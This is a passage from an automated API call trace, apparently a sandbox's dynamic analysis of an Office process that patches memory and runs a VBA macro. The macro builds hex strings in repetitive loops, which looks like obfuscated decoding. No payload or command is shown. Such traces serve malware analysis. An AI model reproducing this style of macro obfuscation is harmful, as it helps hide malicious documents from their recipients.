lpflOldProtect=0x19712c*=0x40) returned 1 [0114.734] GetCurrentProcess () returned 0xffffffff [0114.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.734] GetCurrentProcess () returned 0xffffffff [0114.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.734] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.734] GetCurrentProcess () returned 0xffffffff [0114.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.734] GetCurrentProcess () returned 0xffffffff [0114.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.734] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.735] GetCurrentProcess () returned 0xffffffff [0114.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.735] GetCurrentProcess () returned 0xffffffff [0114.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.735] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.736] GetCurrentProcess () returned 0xffffffff [0114.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.736] GetCurrentProcess () returned 0xffffffff [0114.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.736] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.736] GetCurrentProcess () returned 0xffffffff [0114.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.736] GetCurrentProcess () returned 0xffffffff [0114.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.737] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.737] GetCurrentProcess () returned 0xffffffff [0114.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.737] GetCurrentProcess () returned 0xffffffff [0114.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.755] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.756] GetCurrentProcess () returned 0xffffffff [0114.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.756] GetCurrentProcess () returned 0xffffffff [0114.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.756] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.756] GetCurrentProcess () returned 0xffffffff [0114.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.757] GetCurrentProcess () returned 0xffffffff [0114.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.757] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.757] GetCurrentProcess () returned 0xffffffff [0114.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.757] GetCurrentProcess () returned 0xffffffff [0114.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.757] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.758] GetCurrentProcess () returned 0xffffffff [0114.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.758] GetCurrentProcess () returned 0xffffffff [0114.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.758] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.759] GetCurrentProcess () returned 0xffffffff [0114.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.759] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.759] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0114.759] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0114.759] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.760] GetProcAddress (hModule=0x695d0000, lpProcName=0x234) returned 0x697ab15f [0114.868] GetAsyncKeyState (vKey=3) returned 0 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.869] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.871] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.871] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.871] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.871] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.871] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.871] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.871] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.872] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.872] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.872] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.872] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.872] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.872] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.873] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.873] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.873] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.873] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.873] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.873] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.874] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.874] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.874] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.874] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.874] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.874] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.875] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.875] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.875] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.875] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.875] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.875] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.875] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.876] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.876] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.876] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.876] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.876] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.876] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.877] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.877] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.877] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.877] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.877] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.877] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.877] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.877] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.877] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.878] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.878] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.878] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.878] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.878] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.886] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.886] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.886] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.886] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.886] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.886] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.887] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.887] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.887] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.887] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.887] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.887] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.887] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.888] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.888] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.888] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.888] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.888] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.888] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.888] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.889] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.889] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.889] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.889] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.889] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.889] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.890] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.890] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.890] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.890] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.890] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.890] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.891] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, 